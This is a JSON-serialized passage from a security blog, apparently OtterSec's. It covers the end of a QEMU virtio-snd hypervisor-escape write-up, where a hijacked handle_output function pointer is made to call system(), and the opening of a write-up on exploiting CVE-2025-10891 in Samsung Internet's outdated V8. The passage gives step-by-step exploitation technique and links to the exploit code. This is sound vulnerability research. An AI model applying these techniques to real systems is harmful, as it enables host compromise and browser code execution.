  VirtIODevice ",{"type":26,"tag":137,"props":133988,"children":133989},{"style":5590},[133990],{"type":32,"value":7152},{"type":26,"tag":137,"props":133992,"children":133993},{"style":5601},[133994],{"type":32,"value":133995},"vdev;\n",{"type":26,"tag":137,"props":133997,"children":133998},{"class":5559,"line":5878},[133999],{"type":26,"tag":137,"props":134000,"children":134001},{"emptyLinePlaceholder":18},[134002],{"type":32,"value":6276},{"type":26,"tag":137,"props":134004,"children":134005},{"class":5559,"line":5891},[134006],{"type":26,"tag":137,"props":134007,"children":134008},{"style":5601},[134009],{"type":32,"value":107381},{"type":26,"tag":137,"props":134011,"children":134012},{"class":5559,"line":5909},[134013],{"type":26,"tag":137,"props":134014,"children":134015},{"style":5601},[134016],{"type":32,"value":19170},{"type":26,"tag":35,"props":134018,"children":134019},{},[134020,134021,134027,134029,134035],{"type":32,"value":19206},{"type":26,"tag":130,"props":134022,"children":134024},{"className":134023},[],[134025],{"type":32,"value":134026},".handle_output",{"type":32,"value":134028}," field is a callback, specifically a function pointer that gets called when the virtqueue receives a notification from the guest, and ",{"type":26,"tag":130,"props":134030,"children":134032},{"className":134031},[],[134033],{"type":32,"value":134034},".vdev",{"type":32,"value":134036}," is the pointer passed to it as the first argument:",{"type":26,"tag":5512,"props":134038,"children":134040},{"code":134039,"language":4326,"meta":7,"className":19107,"style":7},"static void virtio_queue_notify_vq(VirtQueue *vq)\n{\n    if (vq->vring.desc && vq->handle_output) {\n        VirtIODevice *vdev = vq->vdev;\n\n        [...]\n\n        vq->handle_output(vdev, vq);\n\n        [...]\n    }\n}\n",[134041],{"type":26,"tag":130,"props":134042,"children":134043},{"__ignoreMap":7},[134044,134077,134084,134139,134176,134183,134190,134197,134218,134225,134232,134239],{"type":26,"tag":137,"props":134045,"children":134046},{"class":5559,"line":5560},[134047,134051,134055,134060,134065,134069,134073],{"type":26,"tag":137,"props":134048,"children":134049},{"style":5573},[134050],{"type":32,"value":53647},{"type":26,"tag":137,"props":134052,"children":134053},{"style":5573},[134054],{"type":32,"value":53652},{"type":26,"tag":137,"props":134056,"children":134057},{"style":5682},[134058],{"type":32,"value":134059}," virtio_queue_notify_vq",{"type":26,"tag":137,"props":134061,"children":134062},{"style":5601},[134063],{"type":32,"value":134064},"(VirtQueue ",{"type":26,"tag":137,"props":134066,"children":134067},{"style":5590},[134068],{"type":32,"value":7152},{"type":26,"tag":137,"props":134070,"children":134071},{"style":5584},[134072],{"type":32,"value":126424},{"type":26,"tag":137,"props":134074,"children":134075},{"style":5601},[134076],{"type":32,"value":5742},{"type":26,"tag":137,"props":134078,"children":134079},{"class":5559,"line":5412},[134080],{"type":26,"tag":137,"props":134081,"children":134082},{"style":5601},[134083],{"type":32,"value":13471},{"type":26,"tag":137,"props":134085,"children":134086},{"class":5559,"line":5417},[134087,134091,134095,134099,134103,134108,134112,134117,134121,134126,134130,134135],{"type":26,"tag":137,"props":134088,"children":134089},{"style":5610},[134090],{"type":32,"value":14870},{"type":26,"tag":137,"props":134092,"children":134093},{"style":5601},[134094],{"type":32,"value":4625},{"type":26,"tag":137,"props":134096,"children":134097},{"style":5584},[134098],{"type":32,"value":126424},{"type":26,"tag":137,"props":134100,"children":134101},{"style":5601},[134102],{"type":32,"value":16348},{"type":26,"tag":137,"props":134104,"children":134105},{"style":5584},[134106],{"type":32,"value":134107},"vring",{"type":26,"tag":137,"props":134109,"children":134110},{"style":5601},[134111],{"type":32,"value":470},{"type":26,"tag":137,"props":134113,"children":134114},{"style":5584},[134115],{"type":32,"value":134116},"desc",{"type":26,"tag":137,"props":134118,"children":134119},{"style":5590},[134120],{"type":32,"value":16776},{"type":26,"tag":137,"props":134122,"children":134123},{"style":5584},[134124],{"type":32,"value":134125}," vq",{"type":26,"tag":137,"props":134127,"children":134128},{"style":5601},[134129],{"type":32,"value":16348},{"type":26,"tag":137,"props":134131,"children":134132},{"style":5584},[134133],{"type":32,"value":134134},"handle_output",{"type":26,"tag":137,"props":134136,"children":134137},{"style":5601},[134138],{"type":32,"value":17395},{"type":26,"tag":137,"props":134140,"children":134141},{"class":5559,"line":5642},[134142,134147,134151,134156,134160,134164,134168,134172],{"type":26,"tag":137,"props":134143,"children":134144},{"style":5601},[134145],{"type":32,"value":134146},"        VirtIODevice ",{"type":26,"tag":137,"props":134148,"children":134149},{"style":5590},[134150],{"type":32,"value":7152},{"type":26,"tag":137,"props":134152,"children":134153},{"style":5601},[134154],{"type":32,"value":134155},"vdev ",{"type":26,"tag":137,"props":134157,"children":134158},{"style":5590},[134159],{"type":32,"value":289},{"type":26,"tag":137,"props":134161,"children":134162},{"style":5584},[134163],{"type":32,"value":134125},{"type":26,"tag":137,"props":134165,"children":134166},{"style":5601},[134167],{"type":32,"value":16348},{"type":26,"tag":137,"props":134169,"children":134170},{"style":5584},[134171],{"type":32,"value":126410},{"type":26,"tag":137,"props":134173,"children":134174},{"style":5601},[134175],{"type":32,"value":5604},{"type":26,"tag":137,"props":134177,"children":134178},{"class":5559,"line":5745},[134179],{"type":26,"tag":137,"props":134180,"children":134181},{"emptyLinePlaceholder":18},[134182],{"type":32,"value":6276},{"type":26,"tag":137,"props":134184,"children":134185},{"class":5559,"line":5850},[134186],{"type":26,"tag":137,"props":134187,"children":134188},{"style":5601},[134189],{"type":32,"value":126591},{"type":26,"tag":137,"props":134191,"children":134192},{"class":5559,"line":5878},[134193],{"type":26,"tag":137,"props":134194,"children":134195},{"emptyLinePlaceholder":18},[134196],{"type":32,"value":6276},{"type":26,"tag":137,"props":134198,"children":134199},{"class":5559,"line":5891},[134200,134205,134209,134213],{"type":26,"tag":137,"props":134201,"children":134202},{"style":5584},[134203],{"type":32,"value":134204},"        vq",{"type":26,"tag":137,"props":134206,"children":134207},{"style":5601},[134208],{"type":32,"value":16348},{"type":26,"tag":137,"props":134210,"children":134211},{"style":5682},[134212],{"type":32,"value":134134},{"type":26,"tag":137,"props":134214,"children":134215},{"style":5601},[134216],{"type":32,"value":134217},"(vdev, vq);\n",{"type":26,"tag":137,"props":134219,"children":134220},{"class":5559,"line":5909},[134221],{"type":26,"tag":137,"props":134222,"children":134223},{"emptyLinePlaceholder":18},[134224],{"type":32,"value":6276},{"type":26,"tag":137,"props":134226,"children":134227},{"class":5559,"line":5930},[134228],{"type":26,"tag":137,"props":134229,"children":134230},{"style":5601},[134231],{"type":32,"value":126591},{"type":26,"tag":137,"props":134233,"children":134234},{"class":5559,"line":5939},[134235],{"type":26,"tag":137,"props":134236,"children":134237},{"style":5601},[134238],{"type":32,"value":5945},{"type":26,"tag":137,"props":134240,"children":134241},{"class":5559,"line":6191},[134242],{"type":26,"tag":137,"props":134243,"children":134244},{"style":5601},[134245],{"type":32,"value":6507},{"type":26,"tag":35,"props":134247,"children":134248},{},[134249,134251,134256,134258,134263,134265,134271,134273,134278,134279,134284,134286,134291],{"type":32,"value":134250},"This means that if we free the known-address chunk and replace it with a ",{"type":26,"tag":130,"props":134252,"children":134254},{"className":134253},[],[134255],{"type":32,"value":127076},{"type":32,"value":134257}," - which is straightforward, since we control the buffer allocation size through the ",{"type":26,"tag":130,"props":134259,"children":134261},{"className":134260},[],[134262],{"type":32,"value":126665},{"type":32,"value":134264}," iovec - we can use the arbitrary read primitive to read its ",{"type":26,"tag":130,"props":134266,"children":134268},{"className":134267},[],[134269],{"type":32,"value":134270},".vq",{"type":32,"value":134272}," pointer, then follow that pointer to leak ",{"type":26,"tag":130,"props":134274,"children":134276},{"className":134275},[],[134277],{"type":32,"value":134026},{"type":32,"value":18645},{"type":26,"tag":130,"props":134280,"children":134282},{"className":134281},[],[134283],{"type":32,"value":133928},{"type":32,"value":134285}," structure. In our case, that field points to ",{"type":26,"tag":130,"props":134287,"children":134289},{"className":134288},[],[134290],{"type":32,"value":126317},{"type":32,"value":134292},", which gives us QEMU's base address.",{"type":26,"tag":35,"props":134294,"children":134295},{},[134296,134298,134304],{"type":32,"value":134297},"From there, we can use the arbitrary read primitive once more to read a resolved entry from QEMU's GOT, leaking a libc address. With that, we can compute the address of ",{"type":26,"tag":130,"props":134299,"children":134301},{"className":134300},[],[134302],{"type":32,"value":134303},"system",{"type":32,"value":470},{"type":26,"tag":118,"props":134306,"children":134308},{"id":134307},"rip-control",[134309],{"type":32,"value":134310},"RIP Control",{"type":26,"tag":35,"props":134312,"children":134313},{},[134314,134316,134321,134323,134329],{"type":32,"value":134315},"At this point, we have everything we need: an arbitrary read/write primitive, a QEMU code leak, and the address of ",{"type":26,"tag":130,"props":134317,"children":134319},{"className":134318},[],[134320],{"type":32,"value":134303},{"type":32,"value":134322},". To hijack control flow, we do not need to look far - we just described a function pointer on the heap at a known address: ",{"type":26,"tag":130,"props":134324,"children":134326},{"className":134325},[],[134327],{"type":32,"value":134328},"VirtQueue.handle_output",{"type":32,"value":470},{"type":26,"tag":35,"props":134331,"children":134332},{},[134333,134335,134340,134342,134347,134349,134354],{"type":32,"value":134334},"We overwrite ",{"type":26,"tag":130,"props":134336,"children":134338},{"className":134337},[],[134339],{"type":32,"value":134026},{"type":32,"value":134341}," with the address of ",{"type":26,"tag":130,"props":134343,"children":134345},{"className":134344},[],[134346],{"type":32,"value":134303},{"type":32,"value":134348}," and write the command string we want to execute into memory using our arbitrary write. Then we overwrite ",{"type":26,"tag":130,"props":134350,"children":134352},{"className":134351},[],[134353],{"type":32,"value":134034},{"type":32,"value":134355}," with the address of that command string, so it is passed as the first argument.",{"type":26,"tag":35,"props":134357,"children":134358},{},[134359,134361,134367,134369,134375,134377,134383],{"type":32,"value":134360},"Then, we simply notify the virtqueue from the guest. QEMU enters ",{"type":26,"tag":130,"props":134362,"children":134364},{"className":134363},[],[134365],{"type":32,"value":134366},"virtio_queue_notify_vq",{"type":32,"value":134368},", which calls ",{"type":26,"tag":130,"props":134370,"children":134372},{"className":134371},[],[134373],{"type":32,"value":134374},"vq->handle_output(vq->vdev)",{"type":32,"value":134376}," - or, after our overwrites, ",{"type":26,"tag":130,"props":134378,"children":134380},{"className":134379},[],[134381],{"type":32,"value":134382},"system(command)",{"type":32,"value":470},{"type":26,"tag":35,"props":134385,"children":134386},{},[134387,134389,134395,134397],{"type":32,"value":134388},"Finally, with all of this, we achieve a reliable guest-to-host escape and execute ",{"type":26,"tag":130,"props":134390,"children":134392},{"className":134391},[],[134393],{"type":32,"value":134394},"gnome-calculator",{"type":32,"value":134396}," on the host system:\n",{"type":26,"tag":33563,"props":134398,"children":134399},{},[],{"type":26,"tag":5503,"props":134401,"children":134405},{"className":134402,"dataMediaMaxWidth":134404},[134403],"twitter-tweet","560",[134406,134430,134441,134444,134447,134449],{"type":26,"tag":35,"props":134407,"children":134410},{"lang":134408,"dir":134409},"en","ltr",[134411,134413,134416,134419,134421,134424,134425,134428],{"type":32,"value":134412},"We recently achieved guest-to-host escape by exploiting a QEMU 0day.",{"type":26,"tag":33563,"props":134414,"children":134415},{},[],{"type":26,"tag":33563,"props":134417,"children":134418},{},[],{"type":32,"value":134420},"We’ll share details on a new technique leveraging the latest glibc allocator behavior and what we believe is a novel QEMU-specific heap spray/RIP-control primitive.",{"type":26,"tag":33563,"props":134422,"children":134423},{},[],{"type":32,"value":1011},{"type":26,"tag":33563,"props":134426,"children":134427},{},[],{"type":32,"value":134429},"Writeup coming next week. ",{"type":26,"tag":137,"props":134431,"children":134434},{"className":134432},[134433],"tweet-attribution",[134435],{"type":26,"tag":41,"props":134436,"children":134438},{"href":134437},"https://twitter.com/osec_io/status/2029643325125390550?ref_src=twsrc%5Etfw",[134439],{"type":32,"value":134440},"— OtterSec (@osec_io) March 5, 2026",{"type":26,"tag":33563,"props":134442,"children":134443},{},[],{"type":26,"tag":33563,"props":134445,"children":134446},{},[],{"type":32,"value":134448},"\n  ",{"type":26,"tag":134450,"props":134451,"children":134453},"video",{"controls":18,"width":134452},"100%",[134454,134456,134462],{"type":32,"value":134455},"\n    ",{"type":26,"tag":134457,"props":134458,"children":134461},"source",{"src":134459,"type":134460},"/posts/virtio-snd-qemu-0day/demo.mp4","video/mp4",[],{"type":32,"value":134463},"\n    Your browser does not support the video tag.\n  ",{"type":26,"tag":33563,"props":134465,"children":134466},{},[],{"type":26,"tag":35,"props":134468,"children":134469},{},[134470,134472,134478,134480,134486],{"type":32,"value":134471},"The final exploit, targeting QEMU commit ",{"type":26,"tag":130,"props":134473,"children":134475},{"className":134474},[],[134476],{"type":32,"value":134477},"ece408818d27f745ef1b05fb3cc99a1e7a5bf580",{"type":32,"value":134479}," (Feb 13, 2026) and the latest glibc 2.43, can be found ",{"type":26,"tag":41,"props":134481,"children":134484},{"href":134482,"rel":134483},"https://github.com/otter-sec/qemu-escape",[45],[134485],{"type":32,"value":3580},{"type":32,"value":470},{"type":26,"tag":35,"props":134488,"children":134489},{},[134490,134492,134499],{"type":32,"value":134491},"Special thanks to ",{"type":26,"tag":41,"props":134493,"children":134496},{"href":134494,"rel":134495},"https://www.willsroot.io/",[45],[134497],{"type":32,"value":134498},"William Liu",{"type":32,"value":134500}," for proofreading this post and helping us polish it before publication.",{"type":26,"tag":92,"props":134502,"children":134503},{"id":31526},[134504],{"type":32,"value":21540},{"type":26,"tag":35,"props":134506,"children":134507},{},[134508],{"type":32,"value":134509},"Starting from a heap overflow where the written bytes are effectively random, we showed how careful heap grooming and a favorable change in glibc 2.43's allocator can turn even a single byte of uncontrolled corruption into a reliable guest-to-host escape.",{"type":26,"tag":35,"props":134511,"children":134512},{},[134513],{"type":32,"value":134514},"More broadly, this exploit is a reminder that weak-looking primitives should not be dismissed too quickly - with the right heap layout and target, even highly constrained corruption can be enough.",{"type":26,"tag":7949,"props":134516,"children":134517},{},[134518],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":134520},[134521,134524,134527,134536],{"id":126213,"depth":5412,"text":126226,"children":134522},[134523],{"id":126234,"depth":5417,"text":126237},{"id":126258,"depth":5412,"text":126261,"children":134525},[134526],{"id":126272,"depth":5417,"text":126272},{"id":102689,"depth":5412,"text":102692,"children":134528},[134529,134530,134531,134532,134533,134534,134535],{"id":128863,"depth":5417,"text":128866},{"id":130390,"depth":5417,"text":130393},{"id":131184,"depth":5417,"text":131187},{"id":131589,"depth":5417,"text":131592},{"id":131805,"depth":5417,"text":131808},{"id":132011,"depth":5417,"text":132014},{"id":134307,"depth":5417,"text":134310},{"id":31526,"depth":5412,"text":21540},"content:blog:2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape",{"_path":134541,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":134542,"description":134543,"date":134544,"author":134545,"image":134548,"isFeatured":18,"onBlogPage":18,"tags":134550,"body":134553,"_type":5433,"_id":144459,"_source":5435,"_file":144460,"_stem":144461,"_extension":5438},"/blog/2026-04-01-patch-gap-to-mobile-renderer-rce","Patch Gap to Mobile Renderer RCE: Pwning Samsung Internet's V8 on the Galaxy S25","Samsung Internet on the Galaxy S25 shipped a six-month-old version of V8, exposing it to publicly known bugs. Learn how we exploited a bytecode interpreter vulnerability to achieve renderer RCE and universal XSS in the browser.","2026-04-01T12:00:00.000Z",[126209,134546,134547],"jamie","william",{"src":134549,"width":16,"height":17},"/posts/mobile-renderer-rce/title.png",[134551,134552],"RCE","mobile",{"type":23,"children":134554,"toc":144439},[134555,134559,134564,134578,134584,134598,134619,134627,134640,134648,134661,134667,134680,134694,134700,134714,134817,134822,134830,134835,134840,134861,134939,134947,134966,134979,134985,134991,135005,135121,135126,135131,135139,135144,135152,135180,135209,135221,135397,135402,135410,135429,135442,135448,135468,135482,135487,135492,135520,135556,135625,135631,135653,135658,135666,135679,135684,135692,135697,135736,135742,135755,135760,135938,135948,135956,135976,136000,136013,136019,136024,136666,136671,136679,136721,138710,138715,138723,138729,138762,138780,138950,139008,139033,139127,139132,139923,139928,139936,139947,141991,141996,142004,142010,142032,142046,142059,142071,142101,142106,142547,142575,142682,142699,142856,142861,142873,143169,143195,143218,143350,143362,143367,143519,143555,143568,143573,143694,143735,143812,143817,144391,144397,144409,144421,144425,144430,144435],{"type":26,"tag":92,"props":134556,"children":134557},{"id":31609},[134558],{"type":32,"value":31612},{"type":26,"tag":35,"props":134560,"children":134561},{},[134562],{"type":32,"value":134563},"The supply chain dependency in today's software landscape is extremely complex. Any vulnerability in a core library creates an exploitable window for its dependents - maintainers either fall behind on the exhausting update schedule, backport incorrectly, or even forget about it entirely.",{"type":26,"tag":35,"props":134565,"children":134566},{},[134567,134569,134576],{"type":32,"value":134568},"One such example is V8, a JavaScript engine used ubiquitously in Chromium and Node.js-based software. In collaboration with the ",{"type":26,"tag":41,"props":134570,"children":134573},{"href":134571,"rel":134572},"https://cor.team",[45],[134574],{"type":32,"value":134575},"Crusaders of Rust",{"type":32,"value":134577}," Security Research Group, we decided to analyze the version of V8 in Samsung Internet (the default browser on Samsung phones) on a Samsung Galaxy S25 in hopes of an n-day exploitation opportunity.",{"type":26,"tag":118,"props":134579,"children":134581},{"id":134580},"finding-the-v8-version",[134582],{"type":32,"value":134583},"Finding the V8 Version",{"type":26,"tag":35,"props":134585,"children":134586},{},[134587,134589,134596],{"type":32,"value":134588},"We started by pulling Samsung Internet's APK from the device over ",{"type":26,"tag":41,"props":134590,"children":134593},{"href":134591,"rel":134592},"https://developer.android.com/tools/adb",[45],[134594],{"type":32,"value":134595},"adb",{"type":32,"value":134597}," and inspecting the libraries it shipped with.",{"type":26,"tag":35,"props":134599,"children":134600},{},[134601,134603,134609,134611,134617],{"type":32,"value":134602},"After extracting the APK, we searched the ",{"type":26,"tag":130,"props":134604,"children":134606},{"className":134605},[],[134607],{"type":32,"value":134608},"lib/",{"type":32,"value":134610}," directory for ",{"type":26,"tag":130,"props":134612,"children":134614},{"className":134613},[],[134615],{"type":32,"value":134616},"v8::*",{"type":32,"value":134618}," symbols:",{"type":26,"tag":5512,"props":134620,"children":134622},{"code":134621},"$ grep -r 'v8::' lib/\ngrep: lib/arm64-v8a/libterrace.so: binary file matches\n",[134623],{"type":26,"tag":130,"props":134624,"children":134625},{"__ignoreMap":7},[134626],{"type":32,"value":134621},{"type":26,"tag":35,"props":134628,"children":134629},{},[134630,134632,134638],{"type":32,"value":134631},"Only one file matched our search: ",{"type":26,"tag":130,"props":134633,"children":134635},{"className":134634},[],[134636],{"type":32,"value":134637},"libterrace.so",{"type":32,"value":134639},". We then loaded it into a decompiler to inspect it more closely, which is where we found the bundled V8 version:",{"type":26,"tag":35,"props":134641,"children":134642},{},[134643],{"type":26,"tag":2210,"props":134644,"children":134647},{"alt":134645,"src":134646},"image1","/posts/mobile-renderer-rce/image1.png",[],{"type":26,"tag":35,"props":134649,"children":134650},{},[134651,134653,134659],{"type":32,"value":134652},"Surprisingly, this ",{"type":26,"tag":130,"props":134654,"children":134656},{"className":134655},[],[134657],{"type":32,"value":134658},"13.6.233.10",{"type":32,"value":134660}," version was already six months old at the time, with multiple publicly known bugs affecting it.",{"type":26,"tag":118,"props":134662,"children":134664},{"id":134663},"choosing-the-bug",[134665],{"type":32,"value":134666},"Choosing the Bug",{"type":26,"tag":35,"props":134668,"children":134669},{},[134670,134672,134678],{"type":32,"value":134671},"We were able to trigger a couple of bugs on our locally compiled ",{"type":26,"tag":130,"props":134673,"children":134675},{"className":134674},[],[134676],{"type":32,"value":134677},"d8",{"type":32,"value":134679}," matching the target version. One of them was CVE-2025-5419 - a store-store elimination bug that we managed to get working on the device. However, exploitation required heap spraying, which would present significant stability issues when porting to the phone.",{"type":26,"tag":35,"props":134681,"children":134682},{},[134683,134685,134692],{"type":32,"value":134684},"Another one was ",{"type":26,"tag":41,"props":134686,"children":134689},{"href":134687,"rel":134688},"https://issuetracker.google.com/issues/443875388",[45],[134690],{"type":32,"value":134691},"CVE-2025-10891",{"type":32,"value":134693}," - a bug in the Ignition bytecode interpreter. This one was attractive as bytecode is treated as trusted under the V8 sandbox model, meaning that a separate Übercage bypass would not be required. Given this, we decided to explore this bug further.",{"type":26,"tag":92,"props":134695,"children":134697},{"id":134696},"ignition-bytecode-introduction",[134698],{"type":32,"value":134699},"Ignition Bytecode Introduction",{"type":26,"tag":35,"props":134701,"children":134702},{},[134703,134705,134712],{"type":32,"value":134704},"V8 initially compiles all JS code to a bytecode format with the ",{"type":26,"tag":41,"props":134706,"children":134709},{"href":134707,"rel":134708},"https://v8.dev/blog/ignition-interpreter",[45],[134710],{"type":32,"value":134711},"Ignition",{"type":32,"value":134713}," interpreter.\nThis is a simple register-based VM with fixed size opcodes (and prefix bytes to increase operand width). For instance:",{"type":26,"tag":5512,"props":134715,"children":134717},{"code":134716,"language":33960,"meta":7,"className":33958,"style":7},"let a = 1;\nlet b = 0x0fff;\nlet c = 0x0fffffff;\nlet d = 0xffffffff;\n",[134718],{"type":26,"tag":130,"props":134719,"children":134720},{"__ignoreMap":7},[134721,134744,134768,134792],{"type":26,"tag":137,"props":134722,"children":134723},{"class":5559,"line":5560},[134724,134728,134732,134736,134740],{"type":26,"tag":137,"props":134725,"children":134726},{"style":5573},[134727],{"type":32,"value":14378},{"type":26,"tag":137,"props":134729,"children":134730},{"style":5584},[134731],{"type":32,"value":92438},{"type":26,"tag":137,"props":134733,"children":134734},{"style":5590},[134735],{"type":32,"value":5593},{"type":26,"tag":137,"props":134737,"children":134738},{"style":5626},[134739],{"type":32,"value":7104},{"type":26,"tag":137,"props":134741,"children":134742},{"style":5601},[134743],{"type":32,"value":5604},{"type":26,"tag":137,"props":134745,"children":134746},{"class":5559,"line":5412},[134747,134751,134755,134759,134764],{"type":26,"tag":137,"props":134748,"children":134749},{"style":5573},[134750],{"type":32,"value":14378},{"type":26,"tag":137,"props":134752,"children":134753},{"style":5584},[134754],{"type":32,"value":93311},{"type":26,"tag":137,"props":134756,"children":134757},{"style":5590},[134758],{"type":32,"value":5593},{"type":26,"tag":137,"props":134760,"children":134761},{"style":5626},[134762],{"type":32,"value":134763}," 0x0fff",{"type":26,"tag":137,"props":134765,"children":134766},{"style":5601},[134767],{"type":32,"value":5604},{"type":26,"tag":137,"props":134769,"children":134770},{"class":5559,"line":5417},[134771,134775,134779,134783,134788],{"type":26,"tag":137,"props":134772,"children":134773},{"style":5573},[134774],{"type":32,"value":14378},{"type":26,"tag":137,"props":134776,"children":134777},{"style":5584},[134778],{"type":32,"value":40041},{"type":26,"tag":137,"props":134780,"children":134781},{"style":5590},[134782],{"type":32,"value":5593},{"type":26,"tag":137,"props":134784,"children":134785},{"style":5626},[134786],{"type":32,"value":134787}," 0x0fffffff",{"type":26,"tag":137,"props":134789,"children":134790},{"style":5601},[134791],{"type":32,"value":5604},{"type":26,"tag":137,"props":134793,"children":134794},{"class":5559,"line":5642},[134795,134799,134804,134808,134813],{"type":26,"tag":137,"props":134796,"children":134797},{"style":5573},[134798],{"type":32,"value":14378},{"type":26,"tag":137,"props":134800,"children":134801},{"style":5584},[134802],{"type":32,"value":134803}," d",{"type":26,"tag":137,"props":134805,"children":134806},{"style":5590},[134807],{"type":32,"value":5593},{"type":26,"tag":137,"props":134809,"children":134810},{"style":5626},[134811],{"type":32,"value":134812}," 0xffffffff",{"type":26,"tag":137,"props":134814,"children":134815},{"style":5601},[134816],{"type":32,"value":5604},{"type":26,"tag":35,"props":134818,"children":134819},{},[134820],{"type":32,"value":134821},"compiles to",{"type":26,"tag":5512,"props":134823,"children":134825},{"code":134824}," # Load the Smi `1` into the accumulator\n 0 : 0d 01             LdaSmi [1]\n # Store it to register 0\n 2 : ce                Star0\n # Load the 2-byte Smi `0xfff` into acc\n 3 : 00 0d ff 0f       LdaSmi.Wide [4095]\n # Store it to register 1\n 7 : cd                Star1\n # Load the 4-byte Smi `0xfffffff` into acc\n 8 : 01 0d ff ff ff 0f LdaSmi.ExtraWide [268435455]\n # Store it to register 2\n14 : cc                Star2\n# `0xffffffff` doesn't fit into an Smi, so a `HeapNumber` is allocated in the function's constant pool and loaded\n15 : 13 00             LdaConstant [0]\n# Store it to register 3\n17 : cb                Star3\n18 : 0e                LdaUndefined\n19 : b3                Return\n",[134826],{"type":26,"tag":130,"props":134827,"children":134828},{"__ignoreMap":7},[134829],{"type":32,"value":134824},{"type":26,"tag":35,"props":134831,"children":134832},{},[134833],{"type":32,"value":134834},"Ignition bytecode is then passed through the Sparkplug, Maglev, and Turbofan JIT compilers depending on the required amount of optimization. Yes, V8 has FOUR compilers, all so that slop devs can continue \"engineering\" their RAM-hungry, CPU-draining web apps that have plagued the modern internet.",{"type":26,"tag":118,"props":134836,"children":134838},{"id":134837},"cve-2025-10891",[134839],{"type":32,"value":134691},{"type":26,"tag":35,"props":134841,"children":134842},{},[134843,134845,134851,134853,134859],{"type":32,"value":134844},"The bug is in the handling of try/catch blocks. These are encoded in a function as a list of ",{"type":26,"tag":130,"props":134846,"children":134848},{"className":134847},[],[134849],{"type":32,"value":134850},"[start, end) => handler",{"type":32,"value":134852}," offsets - if an exception is thrown in the given bytecode address range, ",{"type":26,"tag":130,"props":134854,"children":134856},{"className":134855},[],[134857],{"type":32,"value":134858},"handler",{"type":32,"value":134860}," is jumped to.",{"type":26,"tag":5512,"props":134862,"children":134864},{"code":134863,"language":33960,"meta":7,"className":33958,"style":7},"try {\n  throw 1;\n} catch {\n  let b = 2;\n}\n",[134865],{"type":26,"tag":130,"props":134866,"children":134867},{"__ignoreMap":7},[134868,134879,134894,134909,134932],{"type":26,"tag":137,"props":134869,"children":134870},{"class":5559,"line":5560},[134871,134875],{"type":26,"tag":137,"props":134872,"children":134873},{"style":5610},[134874],{"type":32,"value":50933},{"type":26,"tag":137,"props":134876,"children":134877},{"style":5601},[134878],{"type":32,"value":5875},{"type":26,"tag":137,"props":134880,"children":134881},{"class":5559,"line":5412},[134882,134886,134890],{"type":26,"tag":137,"props":134883,"children":134884},{"style":5610},[134885],{"type":32,"value":37798},{"type":26,"tag":137,"props":134887,"children":134888},{"style":5626},[134889],{"type":32,"value":7104},{"type":26,"tag":137,"props":134891,"children":134892},{"style":5601},[134893],{"type":32,"value":5604},{"type":26,"tag":137,"props":134895,"children":134896},{"class":5559,"line":5417},[134897,134901,134905],{"type":26,"tag":137,"props":134898,"children":134899},{"style":5601},[134900],{"type":32,"value":49476},{"type":26,"tag":137,"props":134902,"children":134903},{"style":5610},[134904],{"type":32,"value":51013},{"type":26,"tag":137,"props":134906,"children":134907},{"style":5601},[134908],{"type":32,"value":5875},{"type":26,"tag":137,"props":134910,"children":134911},{"class":5559,"line":5642},[134912,134916,134920,134924,134928],{"type":26,"tag":137,"props":134913,"children":134914},{"style":5573},[134915],{"type":32,"value":10440},{"type":26,"tag":137,"props":134917,"children":134918},{"style":5584},[134919],{"type":32,"value":93311},{"type":26,"tag":137,"props":134921,"children":134922},{"style":5590},[134923],{"type":32,"value":5593},{"type":26,"tag":137,"props":134925,"children":134926},{"style":5626},[134927],{"type":32,"value":10519},{"type":26,"tag":137,"props":134929,"children":134930},{"style":5601},[134931],{"type":32,"value":5604},{"type":26,"tag":137,"props":134933,"children":134934},{"class":5559,"line":5745},[134935],{"type":26,"tag":137,"props":134936,"children":134937},{"style":5601},[134938],{"type":32,"value":6507},{"type":26,"tag":5512,"props":134940,"children":134942},{"code":134941}," 0 : 1b ff f8          Mov \u003Ccontext>, r1\n # Start of try block\n # ---------------------------------\n 3 : 0d 01             LdaSmi [1]\n 5 : b1                Throw\n # ---------------------------------\n 6 : 10                LdaTheHole\n 7 : b0                SetPendingMessage\n # Start of catch handler\n 8 : 0d 02             LdaSmi [2]\n10 : ce                Star0\n11 : 0e                LdaUndefined\n12 : b3                Return\nHandler Table (size = 16)\n   from   to       hdlr (prediction,   data)\n  (   3,   6)  ->     6 (prediction=1, data=1)\n",[134943],{"type":26,"tag":130,"props":134944,"children":134945},{"__ignoreMap":7},[134946],{"type":32,"value":134941},{"type":26,"tag":35,"props":134948,"children":134949},{},[134950,134952,134957,134959,134964],{"type":32,"value":134951},"However, the ",{"type":26,"tag":130,"props":134953,"children":134955},{"className":134954},[],[134956],{"type":32,"value":134858},{"type":32,"value":134958}," offset is stored in a 28-bit bitfield. If the address of the ",{"type":26,"tag":130,"props":134960,"children":134962},{"className":134961},[],[134963],{"type":32,"value":51013},{"type":32,"value":134965}," block does not fit within 28 bits, it will be silently truncated. This will lead to a jump into a completely different part of the code - even in the middle of an instruction.",{"type":26,"tag":35,"props":134967,"children":134968},{},[134969,134971,134977],{"type":32,"value":134970},"One easy way to generate a large enough function, as suggested in the initial report, is to emit many ",{"type":26,"tag":130,"props":134972,"children":134974},{"className":134973},[],[134975],{"type":32,"value":134976},"yield*",{"type":32,"value":134978}," statements, as that drastically increases the size of the Ignition bytecode.",{"type":26,"tag":92,"props":134980,"children":134982},{"id":134981},"exploitation",[134983],{"type":32,"value":134984},"Exploitation",{"type":26,"tag":118,"props":134986,"children":134988},{"id":134987},"constant-smuggling",[134989],{"type":32,"value":134990},"Constant Smuggling",{"type":26,"tag":35,"props":134992,"children":134993},{},[134994,134996,135003],{"type":32,"value":134995},"Our initial approach to exploitation was inspired by the 'shellcode smuggling' ",{"type":26,"tag":41,"props":134997,"children":135000},{"href":134998,"rel":134999},"https://blog.exodusintel.com/2024/01/19/google-chrome-v8-cve-2024-0517-out-of-bounds-write-code-execution/",[45],[135001],{"type":32,"value":135002},"technique",{"type":32,"value":135004}," - when arbitrary read-write is achieved in browser exploits, we can often JIT compile a function like this:",{"type":26,"tag":5512,"props":135006,"children":135008},{"code":135007,"language":33960,"meta":7,"className":33958,"style":7},"let a = -9.255963134931783e61;\nlet b = -9.255963134931783e61;\nlet c = -9.255963134931783e61;\nlet d = 